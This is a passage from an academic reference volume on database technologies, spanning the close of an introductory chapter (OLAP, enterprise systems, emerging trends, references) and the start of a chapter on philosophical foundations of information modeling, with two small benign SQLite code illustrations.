Among the more recent research efforts, Yin and Pedersen (2006) developed simplified queries and a physical query algebra that, according to their claim, matched the performance of queries on integrated databases. Zhang, Liu, Ling, Bruckner, and Tjoa (2006) proposed a framework for mining XML-based data for association rules. They claimed that their approach was more efficient than the then-current best practice of repetitive scans of the (XML) data. Zhao and Siau (2007) proposed the use of a data warehouse metamodel as a framework or architecture to conduct information mediation. Information mediation is a means used to resolve data differences that result from collecting data from online sources, such as XML-based applications.
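A tiny sketch of the middleware idea described above: data captured on a Web site arrives as XML with user-defined tags, is parsed, and is deposited directly into a database table. The XML vocabulary and table below are invented for illustration and do not come from any of the cited systems.

```python
# Minimal sketch: parse user-defined XML tags and load them into a database.
import sqlite3
import xml.etree.ElementTree as ET

captured = """
<orders>
  <order id="1001"><customer>Acme Corp.</customer><total>250.00</total></order>
  <order id="1002"><customer>Widget Inc.</customer><total>99.50</total></order>
</orders>
"""

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE web_order (order_id INTEGER PRIMARY KEY, customer TEXT, total REAL)")

# map each user-defined element to the matching column
for order in ET.fromstring(captured).findall("order"):
    conn.execute(
        "INSERT INTO web_order VALUES (?, ?, ?)",
        (int(order.get("id")), order.findtext("customer"), float(order.findtext("total"))),
    )

print(conn.execute("SELECT * FROM web_order").fetchall())
# [(1001, 'Acme Corp.', 250.0), (1002, 'Widget Inc.', 99.5)]
```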
APPLICATION AND UTILIZATION

Databases, data warehouses, and the technologies underlying them do not possess any real innate value unless the organization can find new and novel ways to use them that might help to provide competitive advantage. This section will discuss a number of the uses to which databases, data warehouses, and related technologies are put. First, OLAP (Online Analytical Processing) is briefly discussed, followed by a short synopsis of business intelligence. The section next moves to the subject of text mining, and closes with a discussion of enterprise applications that make use of database technologies, including ERP (Enterprise Resource Planning), SCM (Supply Chain Management), CRM (Customer Relationship Management), and KM (Knowledge Management) systems.
Online Analytical Processing

Database technologies often revolve around analysis and new and novel means of conducting analysis. In the data mining area, OLAP was among the first areas for which tools were created. As previously discussed, Yin and Pedersen (2006) developed a physical query algebra that they proposed would ease the processing burden of OLAP analyses, especially on quickly changing data sets such as financials. Tools such as these give users more flexibility to create better uses for the mountains of data that organizations are now storing in their databases and warehouses.
Business Intelligence

In addition, given the large data sets now available, it is possible to conduct revealing and sophisticated inferential and predictive statistical analyses that provide much better point estimates of sales or other critical KPIs (Key Performance Indicators). Key Performance Indicators usually refer to the metrics that a manager or employee is tasked with in terms of responsibility (and usually also action authority) for their job. Business Intelligence tools such as these allow Performance Dashboards to be created that provide at-a-glance details regarding KPIs, while at the same time providing the analytic tools necessary should a deficiency be indicated by the KPI or Dashboard.
Text Mining, Security, and Privacy

In the area of data mining, concerns often arise on issues related to consumer or personal privacy. Some data mining, and more recently text mining, applications have brought this problem to the public, and researchers have begun to address the issue from both sides of the question. First, is there a way to preserve individual privacy in light of Homeland Security needs and other national security issues? Thuraisingham (2005) described a way to help preserve privacy via what was termed privacy constraint processing, which is a set of rules imposed on the data set that is designed to maintain the privacy of the individual. Another application of data mining technology is in the area of text mining. Text mining is similar to data mining in that it attempts to recognize and return query-based requests for information. However, text mining goes much farther and extends the idea of data mining by allowing what are called free-text searches of many different data sources, and then examining the returned data set for patterns. Such a tool was proposed by Thompson (2005), and users would be able to search and cross-reference a single name across many different global data sources such as magazines, newspapers, and so on. Obviously, this too has important implications for national security on one side, while on the other there are serious privacy concerns as to who would have access to the tool and what its proper and allowable uses are.
Enterprise Systems

Enterprise systems are intended to span the organization in terms of functional areas, while also serving the various hierarchical levels, typically meaning operations, management, and upper-level (strategic) management. Most typologies include ERP, SCM, CRM, and KM as types of enterprise systems. ERP systems were originally intended to consolidate the various internal systems in the organization into one cohesive, albeit complex, system. That meant, to the extent possible, that the organization would migrate its separate databases into one that spanned the entire organization, which in turn means that successful database design and construction lie at the very core of nearly all successful ERP implementation projects. ERPs are purported to incorporate best-of-class practices and processes, and were originally designed and intended to help the adopting organization maximize its internal operating efficiencies. Organizations also began looking at ways to improve the efficiencies of the relationships with their business partners, and that usually meant some type of SCM system. This was a bit trickier than "simply" tweaking the internal operations of the organization as with ERP (note here that an ERP implementation is arguably one of the most difficult projects many companies have ever attempted), because it meant connecting the systems of two or more organizations intimately enough to allow product to be followed from raw material to finished good. That means connecting two or more databases together to share data, often via a Web application of some type. Some exemplars of this in the business world include Wal-Mart (the Retail Link system), Dell Computers, and Cisco Systems. CRM system creation followed a somewhat different route, likely emerging first in service companies such as the hotel and banking industries. CRMs capture and consolidate data that spans functional areas and use it to present a comprehensive picture of individual customers that identifies the most profitable ones, and to manage the direct contact experience to maximize the customer experience as well as the company's profit. CRMs naturally depend heavily upon the underlying databases and database technologies. Finally, KM systems are intended to "actively manage and leverage" the stores of knowledge in an organization (Laudon & Laudon, 2007), particularly referring to explicit knowledge capture, storage, dissemination, and transfer. Systems of this type may be as simple as a help desk that answers frequently asked questions about a particular subject, or as sophisticated as an active knowledge repository where institutional memory is pursued and stored in an addressable form (a database).
ORGANIZATIONAL AND MANAGERIAL ISSUES

This section speaks to the impact of databases and database technologies on the organization itself, and to the issues managers may find themselves faced with regarding those technologies. The first areas discussed are the relationship between organization size and data quality, organizational memory, and information processing. Next, the problems organizations face when migrating to a Web-based environment are presented, followed by issues organizations must deal with when adopting or implementing systems, such as ERP systems, that include a large database or database technology component. The section ends with a short discussion of the impact of social networks on the underlying data.
Organization Size and Data Quality

When organizations are small, checking the accuracy and quality of the data is (arguably) quite easy. The person who captures the data is often the same person who conducts the analysis on it, and that person knows whether the data is accurate. However, as organizations grow, the problem of data quality often grows simultaneously, because the size of the database grows and analysts are left to wonder about the accuracy of the systems built to capture the data (point-of-sale systems, for example). For example, most of the national consumer databases contain relatively high levels of inaccuracies and, worse, degrade at a relatively stable and predictable rate, with the result that a top cause of business failure is inaccurate data (Laudon & Laudon, 2007). The problem has become so severe that many organizations have created the position of Data Administrator, whose job, among other duties, is to ensure the accuracy of the data stored in the database. Nord, Nord, and Xu (2005) investigated the dimensions of data quality and found that accuracy, timeliness, completeness, and consistency should each be considered, rather than simply whether the data is correct or incorrect.
Organizational Memory and Information Processing (Knowledge Management)

Organizations have long realized that organizational memory is critical to their performance and even survival (Zhang & Zhao, 2006). As employees resign, retire, or are for other reasons removed from the organization, the knowledge that they hold regarding (perhaps) how best to accomplish the company's competitive goals can often leave with them. A possible solution to this dilemma has emerged in the form of KM, or Knowledge Management, systems. While these systems were discussed earlier as a form of enterprise system, KM systems play a large role in capturing, preserving, and utilizing the organizational memory of many companies. Among many other research efforts in the area, Nilakanta, Miller, and Zhu (2006) proposed a framework for developing a technology-based system capable of managing organizational memory. They proposed a core system consisting of a Knowledge Engine that would connect four elements: an organizational memory system, a database, a "knowledge percolator", and a "knowledge navigator." While implementation of the proposed system was not accomplished as part of that research, the initial steps taken indicate the importance organizational memory is assuming. Other research efforts have focused on the problem of making tacit knowledge explicit, or codification as it is commonly called. Nonaka (1994) defined tacit knowledge as knowledge that resides (essentially) in the mind of a human expert. Earl (2001) proposed that, in addition to codifying tacit knowledge, personalization of knowledge is also a means of managing knowledge. Hansen (1999) provided some evidence that an issue faced by organizations called the search-transfer problem was related not only to the codification dilemma, but also to the social network structure of the organization. Social networks will be discussed in more detail later. King (2006) provided a framework for what he called an EKO (Effective Knowledge Organization). He proposed that how the organization processes information is an important underlying element for creating an EKO. His EKO architectural framework included four elements, Innovation, Intellectual Property Management, Organizational Learning, and Core Knowledge Management, surrounding Information Processing. In that framework, the other elements could not function without a stable, accurate information processing scheme.
Web Impact on Business

There is little doubt that in both practice and research the Internet and the Web have impacted business profoundly. E-commerce and e-business strategies and business models have become competitive necessities for businesses in many industries. In such an environment, businesses often find themselves searching for ways to reconfigure their traditional systems to support Web-based commerce. Approaches include a services-based model, in which common services are created and stored in modules or libraries, and then formally contracted for use as they are needed. This eases the burden on systems developers, since "new" systems can often be composed from libraries of existing services. The service model will be discussed in more detail later, in the Emerging Trends section. Meanwhile, businesses still face the problem of moving their legacy systems to a Web-based model. Sang, Follen, Kim, and Lopez (2002) proposed a means of moving legacy systems directly to the Web. Their approach required structured code to be rewritten and placed within objects, and they successfully demonstrated that the approach would work with C++ and CORBA. Naturally, much middleware was used to facilitate the transformation. Other approaches used what was called an indirect migration. This idea essentially used a re-engineering approach to re-analyze the systems and reformulate them from an object-oriented perspective. Li, Huang, Yen, and Chang (2007) proposed a formal five-step methodology for migrating legacy systems to a Web services architecture.
Implementation and Success Issues of Enterprise and Large Database Systems

As systems become more and more complex, implementation of those systems can, and often does, become as complicated as the systems themselves. This becomes especially apparent for enterprise systems of the various types discussed earlier, since they often include a significant database component in addition to the other system modules. Measuring the success of such systems also becomes quite difficult. For example, benefits can be intangible, and attributing business success to a particular project can be uncertain. Determining the critical success factors underlying a particular implementation project is an approach that has been used for some time in the MIS field. While some researchers (Somers & Nelson, 2001) have proposed as many as 22 critical success factors related to ERP implementation, Nah, Islam, and Tan (2007) proposed that a set of four critical success factors could be used to predict success. They formally tested their model via a survey, with the results suggesting that three of the factors (enterprise-wide communication, a project management program, and coordination of project activities) positively affect ERP implementation. The fourth factor, top management support, did not necessarily affect implementation success in that study. Whether there are 22 or only four success factors, the importance of the management effort related to implementation of complex information systems is easily apparent in their formulation. Another point to consider is whether success factors and other managerial issues related to implementation of ERP systems will also be relevant to other types of enterprise systems as well as to database systems, which, as noted earlier, are often a part of an enterprise system implementation.
Social Network Impact on Organizations

Underlying every organization is the social structure that represents the relationships among people inside and outside of the company. In that context, a social network most often refers to a network among people, and social networking sites both inside and outside organizations are gaining in importance. In light of the popularity of MySpace, Facebook, and the other social networking sites, constructing a data model that pertains to social networking has risen in importance. Mitra, Bagchi, and Bandyopadhyay (2007) proposed a data model specified for a social network structure. The development of the model is important not only because of the proliferation of social networking sites, but also because many organizations have begun to create internal social networking sites, such as blogs or wikis, for gathering and disseminating organizational knowledge.
EMERGING TRENDS

Database technologies have become firmly entrenched as critical components in nearly every business. Data warehouses, data mining, and sophisticated analytic techniques have become necessities rather than advantages for many businesses. The Web has assumed an ever-increasing role in many organizations' business models, and techniques have been developed that ease the collection and movement of data from the front-end Web interface to the core database systems. What are the newest issues and emerging trends in that environment? Some emerging trends we have already spoken of, however briefly. Among the most important trends is the continuing movement to the Web. While much work has been done in that area, much more remains. Service-Oriented Architecture (SOA) has emerged as a relatively recent trend for business (Erickson & Siau, 2008). SOA follows a path similar to that of the Web services discussed earlier, in that it is based on a service model. The idea is to create reusable code modules that can be contracted and composed as needed to perform various tasks in the organization. The code modules are then entered into a repository or library, such as UDDI, where organizations can contract and bind the services offered to their own systems. Many of them can be seen to provide a transition between the underlying database and the Web client user interface that is now commonplace for many businesses. In other words, the Web client approach can work just as well for internal users as it does for customers on the Web. SOA also provides a way for organizations to continue to use legacy databases longer than was thought possible, by essentially replacing the aging DBMS with a Web client interface. The practice is not without controversy, however, with detractors insisting that it is just a band-aid approach and a temporary solution to a much more serious problem. The Semantic Web also represents a relatively recent trend that is likely to continue. Tim Berners-Lee (1998, 2004) describes the Semantic Web as "…a set of connected applications for data on the Web in such a way as to form a consistent logical web of data." Basically, the idea is to code Web pages in languages that result in the data on the pages being queryable as in a database. An extremely rough analogy that is making waves currently is Google's search engine technology. While this exposition does not purport to say that Google is a semantic web, the algorithm(s) used by Google make it possible to perform very sophisticated searches of the Web. Now, take Google's ideas and use Berners-Lee's RDF (Resource Description Framework) model as a relatively rigorous architectural basis, and imagine what will be possible in the Web of the future. As previously discussed, knowledge management systems are gaining increasing importance to organizations, and underlying KM development lies a knowledge base in addition to the requisite database. Mobile commerce and mobile commerce applications will likely make huge gains in the near future, and developing applications and technologies to collect, store, and present data will be crucial to this effort. Increasing automation, as seen in Wal-Mart's (and many other companies') adoption of RFID (Radio Frequency Identification) technologies, must also be seen as a call to enhance the performance and robustness of databases and all related technologies. The reason for this is that such systems are moving closer and closer to real-time operation, and analysts will likely want real-time response as well.
Allowing data storage nodes to be other than simply data, such as music, pictures, videos, and so on, will also likely assume ever greater importance, and this means a greater merging of the traditional relational data model with an object-oriented model. This was discussed earlier, but is likely to remain at the forefront of database development. As data stores themselves become ever larger, the analytic and querying tools need to remain capable of handling the larger loads required. Finally, as more and more data migrates to the Web, enhanced security measures must be developed to counter the increasingly sophisticated attacks perpetrated not only by hackers, but also by organized crime and terrorists.
CONCLUSION

This introductory chapter has provided a brief history of database technologies. At the same time, it has also chronicled a number of the more important present trends and practices related to research, development, and deployment of database technologies in business, as well as the impact of databases upon the businesses and organizations utilizing them. The chapter ends with speculation on emerging and future trends related to the area of database technologies. It should be apparent that databases in many ways represent the core of business, since without them operation in today's world would be extremely difficult, if not outright impossible, for nearly every company of any size. Database design, the technologies supporting it, and the implementation practices have come a long way in the past 40 years, and the future should be no less exciting.
REFERENCES

Armstrong, W. (1974). Dependency structures of data base relationships. Proceedings of the 1974 IFIP Congress (pp. 580-583).

Batra, D., Hoffer, J., & Bostrom, R. (1988). A Comparison of User Performance Between the Relational and Extended Entity Relationship Model in the Discovery Phase of Database Design. Proceedings of the Ninth International Conference on Information Systems (pp. 295-306).

Beeri, C., & Bernstein, P. (1979). Computational problems related to the design of normal form relation schemes. ACM Transactions on Database Systems, 4(1), 30-59.

Berners-Lee, T. (1998, 2004). Semantic Web Road map. Whitepaper. Retrieved November 29, 2008 from http://akira.ruc.dk/~jv/KIIS2004/roadmap.pdf

Bosak, R., Clippinger, R., Dobb, C., Goldfinger, R., Jasper, R., Keating, W., Kendrick, G., & Sammet, J. (1962). An Information Algebra. Communications of the ACM, 5(4), 190-204.

Chen, P. (1976). The Entity-Relationship Model: Toward a Unified View of Data. ACM Transactions on Database Systems, 1(1), 9-36.

Childs, D. (1968). Feasibility of a set-theoretical data structure: A general structure based on a reconstituted definition of relation. Proceedings of the 1968 IFIP Congress (pp. 162-172).

Codd, E. (1970). A Relational Model of Data for Large Shared Data Banks. Communications of the ACM, 13(6), 377-387.

DiPaola, R. (1969). The recursive unsolvability of the decision problem for a class of definite formulas. Journal of the ACM, 16(2), 324-327.

Earl, M. (2001). Knowledge Management Strategies. Journal of Management Information Systems, 18(1), 215-233.

Erickson, J., & Siau, K. (2008). Web Services, Service Oriented Computing, and Service Oriented Architecture: Separating Hype from Reality. Journal of Database Management, 19(3), 42-54.

Fagin, R. (1977). Multivalued dependencies and a new normal form for relational databases. ACM Transactions on Database Systems, 2(3), 262-278.
Fagin, R. (1983). Degrees of acyclicity for hypergraphs and relational database schemes. Journal of the ACM, 30(3), 514-550.

Fagin, R., Mendelzon, A., & Ullman, J. (1982). A simplified universal relation assumption and its properties. ACM Transactions on Database Systems, 7(3), 343-360.

Fillat, A., & Kraning, L. (1970). Generalized organization of large databases: A set theoretic approach to relations. MIT MAC TR-70 (by reference from Ullman, 1987).

Google. (2008). Retrieved June 20, 2008 from http://www.google.com/search?hl=en&defl=en&q=define:database&sa=X&oi=glossary_definition&ct=title

Hadzilacos, V. (1988). A Theory of Reliability in Database Systems. Journal of the ACM, 35(1), 121-145.

Hansen, M. (1999). The Search-Transfer Problem: The Role of Weak Ties in Sharing Knowledge Across Organization Subunits. Administrative Science Quarterly, 44(1), 82-111.

Inmon, W., & Hackathorn, R. (1994). Using the Data Warehouse. Wiley and Sons.

Kroenke, D. (1995). Database Processing: Fundamentals, Design, and Implementation. Prentice Hall.

Kuhns, J. (1967). Answering questions by computer, a logical study. RM-5428-PR, Rand Corp. (by reference from Ullman, 1987).

Laudon, K., & Laudon, J. (2007). Management Information Systems: Managing the Digital Firm. Prentice Hall.

Li, S., Huang, S., Yen, D., & Chang, C. (2007). Migrating Legacy Information Systems to Web Services Architecture. Journal of Database Management, 18(4), 1-25.

McFadden, F., Hoffer, J., & Prescott, M. (1999). Modern Database Management. Addison Wesley.

Miller, G. (1956). The Magical Number Seven, Plus or Minus Two: Some Limits on Our Capacity for Processing Information. The Psychological Review, 63(2), 81-97.

Mitra, S., Bagchi, A., & Bandyopadhyay, A. (2007). Design of a Data Model for Social Network Applications. Journal of Database Management, 18(4), 51-79.

Nah, F., Islam, Z., & Tan, M. (2007). Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations. Journal of Database Management, 18(4), 26-50.

Newell, A., & Simon, H. (1972). Human Problem Solving. Prentice Hall.

Nilakanta, S., Miller, L., & Zhu, D. (2006). Organizational Memory Management: Technological and Research Issues. Journal of Database Management, 17(1), 85-94.

Nonaka, I. (1994). A Dynamic Theory of Organizational Knowledge Creation. Organization Science, 5(1), 14-37.

Nord, G., Nord, J., & Xu, H. (2005). An Investigation of the Impact of Organization Size on Data Quality Issues. Journal of Database Management, 16(3), 58-71.
ODBMS.org. (2008). Retrieved July 3, 2008 from http://www.odbms.org/introduction_history.html

Sang, J., Follen, G., Kim, C., & Lopez, I. (2002). Development of CORBA-based Engineering Applications from Legacy FORTRAN Programs. Information and Software Technology, 44(3), 175-184.

Somers, T., & Nelson, K. (2001). The Impact of Critical Success Factors Across the Stages of Enterprise Resource Planning Implementations. Proceedings of the 34th Hawaii International Conference on System Sciences.

Thompson, P. (2005). Text Mining, Names and Security. Journal of Database Management, 15(1), 54-59.

Thuraisingham, B. (2005). Privacy-Preserving Data Mining: Development and Directions. Journal of Database Management, 16(1), 75-87.

Ullman, J. (1987). Database theory—past and future. Proceedings of the Sixth ACM SIGACT-SIGMOD-SIGART Symposium on Principles of Database Systems (pp. 1-10).

Watson, R. (1999). Data Management: Data and Organizations. Wiley and Sons.

Yin, X., & Pedersen, T. (2006). Evaluating XML-Extended OLAP Queries on a Physical Algebra. Journal of Database Management, 17(2), 85-116.

Zhang, J., Liu, H., Ling, T., Bruckner, R., & Tjoa, A. (2006). A Framework for Efficient Association Rule Mining in XML Data. Journal of Database Management, 17(3), 19-40.

Zhang, D., & Zhao, J. (2006). Knowledge Management in Organizations. Journal of Database Management, 17(1), i-vii.

Zhao, L., & Siau, K. (2007). Information Mediation Using Metamodels: An Approach Using XML and Common Warehouse Metamodel. Journal of Database Management, 18(3), 69-82.
About the Editor
John Erickson is an assistant professor in the College of Business Administration at the University of Nebraska at Omaha. His research interests include UML, software complexity, and systems analysis and design issues. He has published in journals such as the CACM and JDM, and in conferences such as AMCIS, ICIS, WITS, EMMSAD, and CAiSE. He has also co-authored several book chapters.
Section I
Fundamental Concepts and Theories

This section serves as the foundation for this exhaustive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters found within these pages provide an excellent framework in which to position database technologies within the field of information science and technology. Individual contributions provide overviews of data warehousing and database management systems, while also exploring critical stumbling blocks of this field. Within this introductory section, the reader can learn and choose from a compendium of expert research on the elemental theories underscoring the research and application of database technologies.
Chapter 1.1
Philosophical Foundations of Information Modeling

John M. Artz
The George Washington University, USA
INTRODUCTION

For the past few decades, there have been articles appearing periodically in the information systems research literature criticizing the field for a lack of theory, no core set of concepts, and no accepted paradigm. It is difficult to tell exactly when this critical self-examination began. However, one reasonable starting point would be an article by Peter Keen (1980) at the First International Conference on Information Systems, which begins with the observation, "At present, MIS [management information systems] research is a theme rather than a substantive field" (p. 9). Keen goes on to criticize MIS research for a lack of a cumulative tradition and other factors that are key requirements for a scientific discipline. A few years later, Culnan (1986) picked up on this idea, cited Keen's remarks, and embarked upon an analysis of the information systems research literature looking for common themes and potentially competing paradigms. Culnan
points out, “As a field matures, new theories are proposed and compete until paradigms emerge” (p. 156)—or, at least, that is the way it is supposed to work. Culnan concludes that the IS research literature consists of “research themes rather than paradigms or even well defined subfields” (p. 167) but excuses the field for its shortcomings with the observation that “MIS is very much a young academic field” (p. 167). While Culnan took an empirical approach to analyzing the state of the art in IS research, Weber (1987) took a theoretical approach sketching out what we should be looking for. Weber observes, “If a science progresses only when it has a paradigm, it behooves the members of a field to seek paradigms and to articulate paradigms via normal science as their primary research activities” (p. 9). He also remarked, with regard to referent disciplines, that “the IS discipline must develop its own paradigm rather than rely on other disciplines’ paradigms if it is to survive in the long run as a distinct discipline” (p. 4).
Orlikowski and Iacono (2001) coalesced the concepts of paradigm, cumulative tradition, and core concepts in the idea of the "IT artifact":

We believe that the lack of theories about IT artifacts, the ways in which they emerge and evolve over time, and how they become interdependent with socio-economic contexts and practices, are key unresolved issues for our field and ones that will become even more problematic in these dynamic and innovative times. (p. 133)

This certainly sharpens the focus of the investigation, but what is the IT artifact? Weber (1987) comes the closest to answering that question. In his article he cites E. F. Codd's (1970) paper as one of the most cited articles in information systems and one that could be considered a candidate as a paradigm, suggesting that the IT artifact is some kind of data model. Later, in an editorial in MIS Quarterly, Weber (2003) points out, "After a long period of discernment, we found we could identify only one class of phenomena, for which theories sourced from other disciplines seemed deficient—namely, phenomena associated with building conceptual models and designing databases" (p. viii). So perhaps the IT artifact has something to do with information models or information modeling. This is plausible since data modeling and information modeling are, perhaps, the only intellectual developments that are unique to information systems. Yet the theories in these areas are sketchy at best. However, theory does not just appear spontaneously: It must be developed. One of the ways in which this can be done is to take general theories from other areas, apply them to phenomena in information systems, and then advance them by making them more specific to IS. The purpose of this article is to do just that. First we begin with a brief description of the process of information modeling followed by a very brief discussion of earlier attempts to address the philosophical foundations. Then we introduce four concepts
from metaphysics that are highly relevant to information modeling. These four concepts are as old as philosophy itself and yet when applied to information modeling, they are as relevant to database design as they were to philosophers over the past few millennia. These four concepts are (a) the concept of identity, (b) the problem of universals, (c) teleology, and (d) the correspondence vs. coherence views of truth. Each concept will be explained in turn, as will its implications for information modeling. Each of these concepts also provides a foundation from which a theory of information modeling and, eventually, a theory of information systems can be built. So, following the introduction of the concepts, we will explain how they were identified.
INFORMATION MODELING

Information modeling is the first step in database design, sometimes referred to as conceptual database design. In this step in the design process, the information modeler examines the domain of interest and determines the classes of entities that will be represented in the database and the relationship between those classes. In a typical university example, one entity class may be Students while another entity class may be Courses. The relationship between Students and Courses is that Students take Courses. As the modeler proceeds, attributes are identified for each entity class. These attributes represent facts of interest that are common to all instances of a class. If a particular student has additional facts, those facts are overlooked in order to have a set of facts common to all students. When the modeler is finished, the conceptual database design is represented in an information model that contains entity-class descriptions, attributes of the entity class, relationships between entity classes, and, possibly, additional information about the nature of those relationships such as cardinality and optionality. In the construction of the information model, a variety of philosophical assumptions are made that address which classes should be represented in the model, where those classes come from, how those classes are identified or constructed, and the truth status of the information in the database.
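As a minimal, purely illustrative sketch of the Students-take-Courses example above (the attribute names are assumptions, not drawn from the chapter), each entity class lists only the facts common to all of its instances, and the many-to-many relationship is represented as a structure of its own linking the two classes.

```python
# Sketch of an information model: two entity classes and the relationship between them.
from dataclasses import dataclass

@dataclass
class Student:            # entity class: attributes shared by every student
    student_id: int
    name: str

@dataclass
class Course:             # entity class: attributes shared by every course
    course_id: str
    title: str

@dataclass
class Takes:              # relationship: which student takes which course
    student_id: int
    course_id: str
    semester: str

model = [
    Student(1, "Alice"),
    Course("IS101", "Database Design"),
    Takes(1, "IS101", "Fall 2008"),
]
print(model)
```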
EARLIER WORK

This is not the first attempt to provide some philosophical grounding for information modeling. The most notable attempts, to date, include William Kent's (1978) Data and Reality, and Information Systems Development and Data Modeling: Conceptual and Philosophical Foundations by Hirschheim, Klein, and Lyytinen (1995). Data and Reality is a truly astonishing work that is an arcane classic among a far too limited set of readers but is likely destined to become one of the first classics of information systems. That is to say that a century from now, readers will still be referring to the concepts in this book whereas little else of what we say today will be remembered. Kent touches on most of the key points in this article. He asserts,

There are a few basic concepts we have to deal with here:
• Oneness
• Sameness. When do we say two things are the same or the same thing? How does change affect identity?
• What is it? In what categories do we perceive the thing to be? What categories do we acknowledge? How well defined are they? (pp. 3-4)
The first two bullets refer to the concept of identity, and the third bullet refers to the problem of universals. Both of these concepts will be addressed below. The problem with Kent’s book, despite its enormous insight for the time, is the fact that important questions are raised with
insufficient conceptual structure surrounding them. Thus, the book is likely to leave one more confused than enlightened. If one were to read the book, go off and study metaphysics for a while, then come back and read the book again, it would make a great deal more sense. Yet few people do that, and Data and Reality is unfortunately relegated to a cult classic. Hirschheim et al. (1995) take a different approach, attempting to ground information systems in social philosophy. They criticize prevailing views of information systems because of the underlying assumption that information systems are "technical systems with social consequences." In opposition to this view, they assert, "In recent years, however, there has been a growing interest in viewing IS as social systems that are technically implemented. They serve as the agent for significant social interactions" (p. 14). Reconceptualizing the phenomenon of information systems, they state, "Hence items of information are meanings that are intended to influence people in some way" (p. 14). This is to say, information systems are not benign representations of reality. They are instead constructed realities, and those constructions serve some purpose. The intentional nature of information systems development is brought into clear focus when Hirschheim et al. (1995) say, "Intentions in systems development are expressed by objectives" (p. 17). This notion that information systems are constructed for a purpose is picked up in this article in the section on teleology. The teleological approach to information systems development relies on the identification of systems development objectives. Despite their strength in social philosophy and teleology, Hirschheim et al. are a little weak in the metaphysics. They nod toward the problem of universals with a brief mention of nominalism (p. 21), but focus on the social aspects of information systems and their potential for social change. It is interesting to observe that in juxtaposing the work of Kent (1978) with the work of
Hirschheim et al. (1995), we see a tension in philosophy that goes all the way back to the pre-Socratic philosophers (Gottlieb, 2002). This tension is between the view that reality is in a constant state of change and the view that reality must be stabilized in order to be understood. The pre-Socratic philosopher Heraclitus is best known for his assertion that you cannot step in the same river twice and viewed reality as being in a constant state of flux. Parmenides rejected the views of Heraclitus on the basis that knowledge is not possible if you accept change as fundamental. We must impose order on reality in order to understand it, and Parmenides viewed the philosophy of Heraclitus as destructive to the project of knowledge (Roochnik, 2002). While this comparison may be overreaching a bit, it is an apt comparison to point out that this tension between views of reality has a long history and cannot be resolved in this article. The views provided here are consistent with Kent and Parmenides and must be considered within that framework.
FOUNDATION CONCEPTS

When an information model is constructed, a wide variety of philosophical assumptions come into play. Following are four philosophical concepts that lie at the foundation of those assumptions. They are the concept of identity, the problem of universals, teleology, and the correspondence vs. coherence views of truth. Each will be discussed in turn. Following the introduction of these concepts, some additional discussion will be provided explaining how these concepts were derived as the foundational concepts for information modeling.
CONCEPT OF IDENTITY

The concept of identity is both deceptively simple and profoundly important. It is one of the most
fundamental concepts in all of metaphysics and goes right to the heart of how we organize our knowledge and make sense out of the world. In its simplest form, the concept of identity addresses the problems that arise when we use the word same (Stroll, 1967). Suppose that you are going to the deli to buy a soda, and your friend asks you to get him a diet Coke. When you get to the deli, you find that all they have is diet Pepsi, so you get your friend one of those. When you return, you find your friend is upset because he asked for a Diet Coke. “But, I got you a diet Pepsi,” you respond. “What difference does it make?” “They are not the same,” your friend replies. Being a good friend, you walk to another deli a couple of blocks further and get two diet Cokes. When you return, you place the two diet Cokes on the table and offer one to your friend. At this point, another friend comes in and you explain how the first friend would not accept the Diet Pepsi because Pepsi and Coke are not the same. So your new friend points to the two cans of Coca Cola, one of which is in front of you and the other of which is in front of your other friend, and asks, “Are those two the same?” “Of course they are,” you respond. “They are both Diet Cokes!” “But, if they are the same,” your friend presses, “then you have the same thing in two places at the same time.” At this point, you have to give up having friends or learn a little more about philosophy. The concept of identity addresses the problems that arise when we group things together for the purposes of intellectual economy. We can group individual items temporally, which gives rise to the problem of the persistence of identity across
time. Or we can group individual items together based upon kind, which gives rise to the problem of universals. An example of the persistence of identity across time is seen in the fact that I drive the same car I drove 10 years ago even though the car I drove 10 years ago was new, while the car I drive now is somewhat worse for the wear and worth a whole lot less money. How can the same car be old and new, expensive and inexpensive? More germane to the process of information modeling is the problem of universals. When we create entity classes in an information model, the underlying assumption is that the entities are entities of the same kind. This notion is reinforced by the relational principle of entity integrity, which asserts that a relational table should not contain more than one kind of entity, and the entity relationship modeling rule that requires internal consistency. That is, all members of an entity class are entities of the same kind. But where do kinds come from and how do we know when an instance of an entity is of a particular kind? This is the problem of universals.
PROBLEM OF UNIVERSALS

When we use the word same to refer to same kind, we are organizing the things of the world into categories. Categories are useful because they help us organize our knowledge efficiently. When I point to a tree and call it a tree, I am assigning it to a category. By doing this, I can apply my general knowledge of trees to the specific tree at which I am pointing. The thing at which I am pointing is actually an instance of a tree, but we do not make that distinction in normal speech. Yet, philosophically, we do make that distinction. The instance at which I am pointing is called a particular, and the category to which I assign it is called a universal. The problem of universals attempts to address the question, where do universals come from? Is a tree a tree because it is a member of the set of trees
or is it a member of the set of trees because it is a tree? This enigmatic question goes to the heart of universal construction. Is a grouping formed from things of the same kind, or are things of the same kind because they are part of the same grouping? There really is no easy answer to this question, and philosophers have provided a variety of answers over the centuries (Artz, 1997). A less enigmatic view of the problem of universals is to ask, when we create categories to organize our knowledge, where do those categories come from? Are the categories real and hence discovered, or are categories constructed and, if so, according to what criteria? The problem of universals is fundamental to information modeling because the process of constructing entity classes is no more or less than the problem of universals. That is worth repeating because the central problem in information modeling is the problem of universals. Understanding what has been said about the problem of universals provides great insight into the process of information modeling. The assumptions one makes on the issue of whether universals are discovered or constructed are called ontological assumptions. A survey of the literature on information modeling reveals that the ontological assumptions made by information modelers are often confused and conflicting (Artz, 2006).
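To make the connection to information modeling concrete, the sketch below (written in Python against the standard-library sqlite3 module; all table, column, and data values are invented for illustration) stores a handful of particulars and then imposes two different universals on them simply by grouping them in different ways. Nothing in the data dictates which grouping is the "right" one; that choice is exactly the ontological assumption discussed above.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE person (name TEXT, role TEXT, age INTEGER)")
    conn.executemany("INSERT INTO person VALUES (?, ?, ?)",
                     [("Bob", "Student", 19), ("Bill", "Student", 24),
                      ("Sarah", "Professor", 47)])

    # One way to carve the domain into categories: by role.
    print(conn.execute(
        "SELECT role, COUNT(*) FROM person GROUP BY role").fetchall())

    # Another way, over the very same particulars: by age bracket.
    print(conn.execute(
        """SELECT CASE WHEN age < 30 THEN 'Younger' ELSE 'Older' END AS bracket,
                  COUNT(*)
           FROM person GROUP BY bracket""").fetchall())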
TELEOLOGY

